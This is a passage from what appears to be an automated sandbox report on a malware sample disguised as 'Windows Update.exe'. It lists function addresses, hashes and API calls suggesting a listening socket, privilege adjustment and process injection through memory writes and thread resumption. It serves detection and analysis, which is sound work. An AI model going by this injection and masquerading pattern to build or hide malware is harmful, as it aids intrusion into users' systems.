                                                                      Uniqueness Score: -1.00%

                                                                      Function 007301B4, Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                      • API String ID: 0-3237638986
                                                                      • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction ID: fd825dc20684a778dd332e3321c969af465c6bb212afb5556c9496a12ac31c2e
                                                                      • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                      • Instruction Fuzzy Hash: 0C4172B290021CABEB21DF90CD89ADE7BB8EF04344F104166FD18E7191D7B99A94CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 006EB4BA, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 327COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __aulldvrm$__aullrem
                                                                      • String ID: +$@AD
                                                                      • API String ID: 643879872-3073025900
                                                                      • Opcode ID: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                      • Instruction ID: 4249730c8176e4e913dd1f52c01bd72ddbd1a814263596dee5092e5de6113d64
                                                                      • Opcode Fuzzy Hash: 0d7612511857791f632887a230211975cfd4e8a3c881828d6afa5ce276b5977e
                                                                      • Instruction Fuzzy Hash: 9AC1807150A3C28ED721CF2A85847ABBFE2AF96304F18585DE8D497352D374CA49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00734DFA, Relevance: 8.9, Strings: 7, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5$H$O$b$i$}$}
                                                                      • API String ID: 0-3760989150
                                                                      • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction ID: a99556a2856c7619e0572af5c5259da85085807c1f01dafef9eebd0437d5f038
                                                                      • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                      • Instruction Fuzzy Hash: 7F51E771C0025DEEEB11CBA8CC44AEEBBBCEF49354F0442A9E555E6192D3389B45CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0073037E, Relevance: 8.9, Strings: 7, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                      • API String ID: 0-2857912252
                                                                      • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction ID: 553b5c2d3d213b6b142dd74c0754381df0050d5932ea4fe964420f363265ba24
                                                                      • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                      • Instruction Fuzzy Hash: DD5149B190025DDBDF25DF60DD499DD7BB8FF04308F10402AF928A6152D3B99AA9CF88
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00731BC4, Relevance: 6.3, Strings: 5, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$X7A$`7A
                                                                      • API String ID: 0-851144607
                                                                      • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction ID: 16d0adfb9746e73bd83a13eeedd8defc6423ab65ffd10954a7a8854a91701aa3
                                                                      • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                      • Instruction Fuzzy Hash: 1C4193B0601742EFC3498F29C5846C1FBE0BB09304F86C2AFC46C9B222C7B4A565CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00705CEC, Relevance: 6.3, Strings: 5, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: bolb$bolc$rahc$tni$txet
                                                                      • API String ID: 0-1228356533
                                                                      • Opcode ID: 8ea7c551fdfc071d3146a50a8c719bf30477a6e8916538b32b717ce8b82fb8f4
                                                                      • Instruction ID: 1ecda4a269dbcee8e8cf416094be67e0c5ac87ff3eda6e1fdc696d955a1a169b
                                                                      • Opcode Fuzzy Hash: 8ea7c551fdfc071d3146a50a8c719bf30477a6e8916538b32b717ce8b82fb8f4
                                                                      • Instruction Fuzzy Hash: 63F0E946F08CB0C2DE38191C60FC1F752D1895271962D439BC8F30B1D286084D83AEF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00731D5D, Relevance: 6.3, Strings: 5, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $/A$,/A$0/A$4/A$`7A
                                                                      • API String ID: 0-2435369464
                                                                      • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction ID: 45b4c6363e22f4bcfbc9d9d5fc8bd5c7a4119161ef18d91c6365312d74860cd0
                                                                      • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                      • Instruction Fuzzy Hash: 570119B4000B49CAD721EF20D1446C6BBF4FB45305F50C90FE4E99B206DBB8A1AACF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 006F8565, Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, Offset: 006D0000, based on PE: true
                                                                      • Associated: 00000007.00000002.248054107.00000000006D0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249677398.0000000000750000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.249837130.000000000076B000.00000002.00020000.sdmp Download File
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ^$^1A$^1A$b
                                                                      • API String ID: 0-1727528133
                                                                      • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction ID: 2bcc08f1ba909aacb6ace21c836fd5efd3486a68578edb11ffd4c2213fde6048
                                                                      • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                      • Instruction Fuzzy Hash: 84619F71A04209AFDB14DF68C981BBDBBA3EF45310F3481A9EA149B391DF31EE508B55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Analysis Process: Windows Update.exe PID: 5204 Parent PID: 1352 Windows Update.exeCOMMON

                                                                      Executed Functions

                                                                      Function 04E00F93, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E01027
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 8ab7e57859e18ad7a3d877f8592f56bf502e1d11e2159e467f7b3e5a20db1055
                                                                      • Instruction ID: a46cf2134b5b792c4fdd428e2a8a735e44f75c0c6fb07e5ab39f91725d4cf742
                                                                      • Opcode Fuzzy Hash: 8ab7e57859e18ad7a3d877f8592f56bf502e1d11e2159e467f7b3e5a20db1055
                                                                      • Instruction Fuzzy Hash: 8B219171509380AFD7128F65DC84F96BFB8EF46310F08C4ABE984DF292D265A949CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00A50, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: d9e16afbaad92f4fb793102b831a9578cf77c561866de6c6e612343c85b7106c
                                                                      • Instruction ID: 51546dae3617d7f0fd6f9579d4545f2706c9f897a3557540819a4fd5229935d6
                                                                      • Opcode Fuzzy Hash: d9e16afbaad92f4fb793102b831a9578cf77c561866de6c6e612343c85b7106c
                                                                      • Instruction Fuzzy Hash: 8021E2B2404784AFE7128B54EC45F96BFA8EF46324F0884AAE9449B292D374A945CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0515F, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04E051DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      • Opcode ID: 95abdec803ba7ce0f635ccb83ec8c0611743b0ac5c64a112c8e4fed40bcc4d70
                                                                      • Instruction ID: 462618036546e788779b60bfcc1b694c2ec444ac65c25381cc4bf0d45d6cccd5
                                                                      • Opcode Fuzzy Hash: 95abdec803ba7ce0f635ccb83ec8c0611743b0ac5c64a112c8e4fed40bcc4d70
                                                                      • Instruction Fuzzy Hash: 52219F75509784AFDB12CF25DC40B52BFB4EF06214F08859AE9858B1A3D271A948DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E0522C, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04E052A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: a524701af38d3bace6222a3b73437653446df19b2c466dcc6696307e9ad86773
                                                                      • Instruction ID: e0b4d80151c11d3613514e74740b7b7d9545a5a014707a244034b3ed0c46c6f1
                                                                      • Opcode Fuzzy Hash: a524701af38d3bace6222a3b73437653446df19b2c466dcc6696307e9ad86773
                                                                      • Instruction Fuzzy Hash: E5219D724097C4AFDB128F25DC45A92FFB0AF0B324F0D84DAE9844F263D275A948DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00FC6, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • bind.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E01027
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: bind
                                                                      • String ID:
                                                                      • API String ID: 1187836755-0
                                                                      • Opcode ID: 36157c1474356582d3527daca69206e23df8684a585cc1771acf634d40e83336
                                                                      • Instruction ID: da3a79b12f95e209735ba0d9c55c1024846412850d2e2d30657913cfd85a2d11
                                                                      • Opcode Fuzzy Hash: 36157c1474356582d3527daca69206e23df8684a585cc1771acf634d40e83336
                                                                      • Instruction Fuzzy Hash: 50118B71500244AEEB21CF55DC84FA6FBA8EF44720F14C46BEE499F281D675A5488AB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06B35, Relevance: 1.6, APIs: 1, Instructions: 60nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E06BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      • Opcode ID: 2bc60680407ac72ea578d9d6f34c383e9a93e7bf649c17e120cb9a707fd2793d
                                                                      • Instruction ID: c75e3dda38d32d0b09b7365d9febe28d59ad040a07015230efb9e28ab27a288c
                                                                      • Opcode Fuzzy Hash: 2bc60680407ac72ea578d9d6f34c383e9a93e7bf649c17e120cb9a707fd2793d
                                                                      • Instruction Fuzzy Hash: E6118171408384AFDB228F55DC44BA2FFB4EF46320F08859EEE849F252D375A558DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E00A8E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • listen.WS2_32(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E00AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: listen
                                                                      • String ID:
                                                                      • API String ID: 3257165821-0
                                                                      • Opcode ID: c88d8ffe93f89dbd92b45439ccd4f525423f47f1e6a8aea7a22d153029019dcf
                                                                      • Instruction ID: 75ce979948e2cca53ae03b0929132e07a6ebab2543afb4c4f2720d0e4051c64c
                                                                      • Opcode Fuzzy Hash: c88d8ffe93f89dbd92b45439ccd4f525423f47f1e6a8aea7a22d153029019dcf
                                                                      • Instruction Fuzzy Hash: 3011C271500204EEEB21DF55DC84FA6FBA8EF45324F14C4ABEE489B241D674A544CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E05196, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04E051DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdjustPrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 2874748243-0
                                                                      • Opcode ID: 3bee631149a31262668e945f6411b5c3cf91e737516d772522bc9b85f2c123bd
                                                                      • Instruction ID: fba038fe7f6c7d5931df24cc3ce92992f3d372442121a321b9bbc956b3cd2e47
                                                                      • Opcode Fuzzy Hash: 3bee631149a31262668e945f6411b5c3cf91e737516d772522bc9b85f2c123bd
                                                                      • Instruction Fuzzy Hash: 14119E31500604EFDB20CF55D884B66FFE4EF08220F08C56ADD498B651D271E458DF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06B62, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 04E06BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MemoryVirtualWrite
                                                                      • String ID:
                                                                      • API String ID: 3527976591-0
                                                                      • Opcode ID: d1695a9768670adf743f9ecfc9e2dbc23ef41d66d236555c9ec9f431ee7831ad
                                                                      • Instruction ID: 732e4e5505ff8043ca2dedd80371c84efb2461a7abe1923bafb4b5cbd28f054a
                                                                      • Opcode Fuzzy Hash: d1695a9768670adf743f9ecfc9e2dbc23ef41d66d236555c9ec9f431ee7831ad
                                                                      • Instruction Fuzzy Hash: 07019E71404644DFDB21CF65D844B96FFA0EF08320F08D4AEDE894B252D276A468DF72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06ABA, Relevance: 1.5, APIs: 1, Instructions: 40nativethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtResumeThread.NTDLL(?,?), ref: 04E06AEF
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: b03ffef53d06db145d8c53cee9080383d8322c71b931eb5a276c68855a8fd2ae
                                                                      • Instruction ID: b82eb48e4130aee3eb493b5bb60d9e8dadfc532b48c274a93ad872465877100a
                                                                      • Opcode Fuzzy Hash: b03ffef53d06db145d8c53cee9080383d8322c71b931eb5a276c68855a8fd2ae
                                                                      • Instruction Fuzzy Hash: 5E01DF70500200DFDB10CF65D884B66FFE4EF04320F08C4AADE488F242E275A458CF61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E05266, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 04E052A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: 63d1eb401d1a1f81431588369c00178a3f75df43e6c4d39cb0a242a086fc15ca
                                                                      • Instruction ID: a370a9d630b33fd95ab758822ee777c37ce0a524b874a357e865bc68c3884fb1
                                                                      • Opcode Fuzzy Hash: 63d1eb401d1a1f81431588369c00178a3f75df43e6c4d39cb0a242a086fc15ca
                                                                      • Instruction Fuzzy Hash: 70018B35504644EFDB21CF59D884B66FFA0EF08320F08D49AEE490B352E2B5A458DF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E033D1, Relevance: 3.1, APIs: 2, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetAdaptersAddresses.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E03369
                                                                      • GetPerAdapterInfo.IPHLPAPI(?,00000E2C,EE35994E,00000000,00000000,00000000,00000000), ref: 04E0345B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AdapterAdaptersAddressesInfo
                                                                      • String ID:
                                                                      • API String ID: 4108532965-0
                                                                      • Opcode ID: 67309ba610315950f6c4353343013191fed33a9aa789044467c4cf3439cf8d14
                                                                      • Instruction ID: d9aa538916cb07877fb097e3c50c10cf0325fc081f002b49c58e9e766e63bac6
                                                                      • Opcode Fuzzy Hash: 67309ba610315950f6c4353343013191fed33a9aa789044467c4cf3439cf8d14
                                                                      • Instruction Fuzzy Hash: 6E31F871509384AFD7128F14DC45F66FFB4EF46320F08C09BED948F292C265A549C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04D63BA1, Relevance: 1.8, APIs: 1, Instructions: 322libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313585660.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 69e21a16ed2c01b7bd1274098ba49c85e818215f3e620a10233935166d064ecc
                                                                      • Instruction ID: 7ff950950f0de2ce85dddb49e1267f9620bb37a3b68df17b45739b30930f0961
                                                                      • Opcode Fuzzy Hash: 69e21a16ed2c01b7bd1274098ba49c85e818215f3e620a10233935166d064ecc
                                                                      • Instruction Fuzzy Hash: 55D1EA34B002498FDB15EF78C594AAE7BB2BF89314F244579D806AB395DB75AC42CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04D63BA8, Relevance: 1.8, APIs: 1, Instructions: 316libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313585660.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c5fc994714cea75e78960a5975c00c01cd836e95cbc5f33661e71a375f32196c
                                                                      • Instruction ID: 05bb50589ed5d40f3f4491da336b060dd22a94e5e51b408b9e8c37a2a13100a4
                                                                      • Opcode Fuzzy Hash: c5fc994714cea75e78960a5975c00c01cd836e95cbc5f33661e71a375f32196c
                                                                      • Instruction Fuzzy Hash: 39C1D734B002498FDB19EF78C594AAE7BB2BF89304F244579D806AB395DB75AD41CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03EDC, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getaddrinfo.WS2_32(?,00000E2C), ref: 04E0400B
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getaddrinfo
                                                                      • String ID:
                                                                      • API String ID: 300660673-0
                                                                      • Opcode ID: ff99c3130bead86e96a0712717711d0c75e41420370d8a4ec0f2e326b97f1647
                                                                      • Instruction ID: 9b5137882951936b7d921de78136b731675ea37a8a258a29a62a70314415a548
                                                                      • Opcode Fuzzy Hash: ff99c3130bead86e96a0712717711d0c75e41420370d8a4ec0f2e326b97f1647
                                                                      • Instruction Fuzzy Hash: D8515D7100D3C06FE7238B208C65BA6BFB8AF07714F1A85DBE9849F1A3D2655949C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E02F1F, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindClose.KERNEL32(?,EE35994E,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 04E02FF0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CloseFind
                                                                      • String ID:
                                                                      • API String ID: 1863332320-0
                                                                      • Opcode ID: aa7eddf592643cdb58e28a15ee192d971845538a47c737f6c8d17eea171d286a
                                                                      • Instruction ID: c0321d3e5fd5df788ab41f6b46f51a5abb8313b968a6f20eeb21a8174343a7b0
                                                                      • Opcode Fuzzy Hash: aa7eddf592643cdb58e28a15ee192d971845538a47c737f6c8d17eea171d286a
                                                                      • Instruction Fuzzy Hash: 27519A7104E3C09FD7138B258C65A52BFB49F43220F0E84DBD985CF2A3D269A848C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E03498, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getnameinfo.WS2_32(?,00000E2C), ref: 04E03589
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getnameinfo
                                                                      • String ID:
                                                                      • API String ID: 1866240144-0
                                                                      • Opcode ID: 3993359c04b8e46323aabfc668661b5522c43d65bf35084b9353108a72a9acec
                                                                      • Instruction ID: ef489ff2a26e1ed876b871bb87ba320cd66a3b671e59080889e2d73a741f5b26
                                                                      • Opcode Fuzzy Hash: 3993359c04b8e46323aabfc668661b5522c43d65bf35084b9353108a72a9acec
                                                                      • Instruction Fuzzy Hash: B9419D724083846FE722CB648C50FA6BFB8EF07310F0984DBE9858B1A3D664A949C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E039CE, Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 04E03A85
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: c390c35db0a48c2c76332d722a744a472ed5a6afcabd9aa9af9baffa574f12ad
                                                                      • Instruction ID: 58853030fe4e0ae131a001fc08efa0b31becc93076cf5434b420eca082768acd
                                                                      • Opcode Fuzzy Hash: c390c35db0a48c2c76332d722a744a472ed5a6afcabd9aa9af9baffa574f12ad
                                                                      • Instruction Fuzzy Hash: D831A671408384AFE712CF64DC44FA7BFB8EF46310F08849BE9859F193D264A909C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04E06933, Relevance: 1.6, APIs: 1, Instructions: 110processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(?,00000E2C), ref: 04E06A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.313622164.0000000004E00000.00000040.00000001.sdmp, Offset: 04E00000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 8d90b93f70fe1a5d40732c2a0c26da3eef0b1f5d6d41499ee1bd44869c17d6e8
                                                                      • Instruction ID: e5ca5a95211c599bcd0afb1b824492f0dcb56b70cb5deb608cebedde2700b35c
                                                                      • Opcode Fuzzy Hash: 8d90b93f70fe1a5d40732c2a0c26da3eef0b1f5d6d41499ee1bd44869c17d6e8
